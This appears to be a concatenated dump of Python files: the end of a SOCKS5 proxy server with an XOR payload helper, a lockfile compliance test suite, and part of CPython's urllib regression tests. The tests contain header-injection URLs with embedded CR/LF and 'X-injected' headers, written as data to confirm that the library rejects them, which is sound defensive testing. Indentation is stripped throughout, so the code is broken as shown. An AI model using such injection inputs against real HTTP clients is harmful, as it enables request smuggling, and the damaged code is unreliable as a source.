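# symmetric single-byte XOR keyed by key1, so applying it twice restores
# the original payload.
def _xorr_roundtrip_demo():
    sample = b'hello world'
    assert xorr(xorr(sample)) == sample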
def TCP():
server=socketserver.ThreadingTCPServer((serverdd,port),Socks5Server)
server.serve_forever()
if __name__ == '__main__':
try:
#http.test()
UDPshd = Process(target=TCP,)
UDPshd.start()
print("TCP running on port: %d" % port)
#global UDPsocked
UDPserver = socketserver.ThreadingUDPServer((serverdd, port), UDPSocks5Server)
print('[+] Listening (UDP & TCP) on port: %d' % port)
UDPserver.serve_forever()
#TCP ()
#print("[+] UDPrunning in :%d" % port)
#UDPserver = socketserver.ThreadingUDPServer((serverdd, port), UDPSocks5Server)
#UDPserver.serve_forever()
except Exception as e:
logging.error(e)
|
compliancetest.py
|
import os
import threading
import shutil
import lockfile
class ComplianceTest(object):
def __init__(self):
self.saved_class = lockfile.LockFile
def _testfile(self):
"""Return platform-appropriate file. Helper for tests."""
import tempfile
return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())
def setup(self):
lockfile.LockFile = self.class_to_test
def teardown(self):
tf = self._testfile()
if os.path.isdir(tf):
shutil.rmtree(tf)
elif os.path.isfile(tf):
os.unlink(tf)
lockfile.LockFile = self.saved_class
def _test_acquire_helper(self, tbool):
# As simple as it gets.
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
def test_acquire_basic_threaded(self):
self._test_acquire_helper(True)
def test_acquire_basic_unthreaded(self):
self._test_acquire_helper(False)
def _test_acquire_no_timeout_helper(self, tbool):
# No timeout test
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait() # wait for thread t to acquire lock
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
assert not lock2.i_am_locking()
try:
lock2.acquire(timeout=-1)
except lockfile.AlreadyLocked:
pass
else:
lock2.release()
raise AssertionError("did not raise AlreadyLocked in"
" thread %s" %
threading.current_thread().name)
e2.set() # tell thread t to release lock
t.join()
def test_acquire_no_timeout_threaded(self):
self._test_acquire_no_timeout_helper(True)
def test_acquire_no_timeout_unthreaded(self):
self._test_acquire_no_timeout_helper(False)
def _test_acquire_timeout_helper(self, tbool):
# Timeout test
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait() # wait for thread t to acquire lock
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
try:
lock2.acquire(timeout=0.1)
except lockfile.LockTimeout:
pass
else:
lock2.release()
raise AssertionError("did not raise LockTimeout in thread %s" %
threading.current_thread().name)
e2.set()
t.join()
def test_acquire_timeout_threaded(self):
self._test_acquire_timeout_helper(True)
def test_acquire_timeout_unthreaded(self):
self._test_acquire_timeout_helper(False)
def _test_release_basic_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
assert not lock.i_am_locking()
try:
lock.release()
except lockfile.NotLocked:
pass
except lockfile.NotMyLock:
raise AssertionError('unexpected exception: %s' %
lockfile.NotMyLock)
else:
raise AssertionError('erroneously unlocked file')
def test_release_basic_threaded(self):
self._test_release_basic_helper(True)
def test_release_basic_unthreaded(self):
self._test_release_basic_helper(False)
def _test_release_from_thread_helper(self, tbool):
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait()
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
assert not lock2.i_am_locking()
try:
lock2.release()
except lockfile.NotMyLock:
pass
else:
raise AssertionError('erroneously unlocked a file locked'
' by another thread.')
e2.set()
t.join()
def test_release_from_thread_threaded(self):
self._test_release_from_thread_helper(True)
def test_release_from_thread_unthreaded(self):
self._test_release_from_thread_helper(False)
def _test_is_locked_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
def test_is_locked_threaded(self):
self._test_is_locked_helper(True)
def test_is_locked_unthreaded(self):
self._test_is_locked_helper(False)
def test_i_am_locking(self):
lock1 = lockfile.LockFile(self._testfile(), threaded=False)
lock1.acquire()
try:
assert lock1.is_locked()
lock2 = lockfile.LockFile(self._testfile())
try:
assert lock1.i_am_locking()
assert not lock2.i_am_locking()
try:
lock2.acquire(timeout=2)
except lockfile.LockTimeout:
lock2.break_lock()
assert not lock2.is_locked()
assert not lock1.is_locked()
lock2.acquire()
else:
raise AssertionError('expected LockTimeout...')
assert not lock1.i_am_locking()
assert lock2.i_am_locking()
finally:
if lock2.i_am_locking():
lock2.release()
finally:
if lock1.i_am_locking():
lock1.release()
def _test_break_lock_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
lock2.break_lock()
assert not lock2.is_locked()
try:
lock.release()
except lockfile.NotLocked:
pass
else:
raise AssertionError('break lock failed')
def test_break_lock_threaded(self):
self._test_break_lock_helper(True)
def test_break_lock_unthreaded(self):
self._test_break_lock_helper(False)
def _lock_wait_unlock(self, event1, event2):
"""Lock from another thread. Helper for tests."""
l = lockfile.LockFile(self._testfile())
l.acquire()
try:
event1.set() # we're in,
event2.wait() # wait for boss's permission to leave
finally:
l.release()
def test_enter(self):
lock = lockfile.LockFile(self._testfile())
lock.acquire()
try:
assert lock.is_locked(), "Not locked after acquire!"
finally:
lock.release()
assert not lock.is_locked(), "still locked after release!"
def _in_thread(func, *args, **kwargs):
"""Execute func(*args, **kwargs) after dt seconds. Helper for tests."""
def _f():
func(*args, **kwargs)
t = threading.Thread(target=_f, name='/*/*')
t.daemon = True
t.start()
return t
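# Hedged usage sketch: ComplianceTest is meant to be subclassed once per lock
# backend, with `class_to_test` pointing at a concrete LockFile implementation
# (the module and class names below are illustrative, not part of this file):
#
#     class TestLinkLockFile(ComplianceTest):
#         class_to_test = lockfile.linklockfile.LinkLockFile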
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
import warnings
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_path_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = "//localhost:7777/test{}/".format(char)
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL,
"contain control.*{}".format(escaped_char_repr)):
urllib.request.urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(
InvalidURL,
"contain control.*{}".format(escaped_char_repr)):
urllib.request.urlopen("https:{}".format(schemeless_url))
# This code path quotes the URL so there is no injection.
resp = urlopen("http:{}".format(schemeless_url))
self.assertNotIn(char, resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_path_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r.*(found at least . .)"):
urllib.request.urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urllib.request.urlopen("https:{}".format(schemeless_url))
# This code path quotes the URL so there is no injection.
resp = urlopen("http:{}".format(schemeless_url))
self.assertNotIn(' ', resp.geturl())
self.assertNotIn('\r', resp.geturl())
self.assertNotIn('\n', resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_host_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = "//localhost{}/test/".format(char)
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*{}".format(escaped_char_repr)):
urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*{}".format(escaped_char_repr)):
urlopen("http:{}".format(schemeless_url))
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_host_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost\r\nX-injected: header\r\n"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r"):
urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urlopen("http:{}".format(schemeless_url))
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
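# The reporthook contract exercised above, as a standalone sketch (the name
# is illustrative): urlretrieve() calls the hook as
#
#     def reporthook(block_count, block_size, total_size): ...
#
# once before the first block is read and then once per block read.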
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
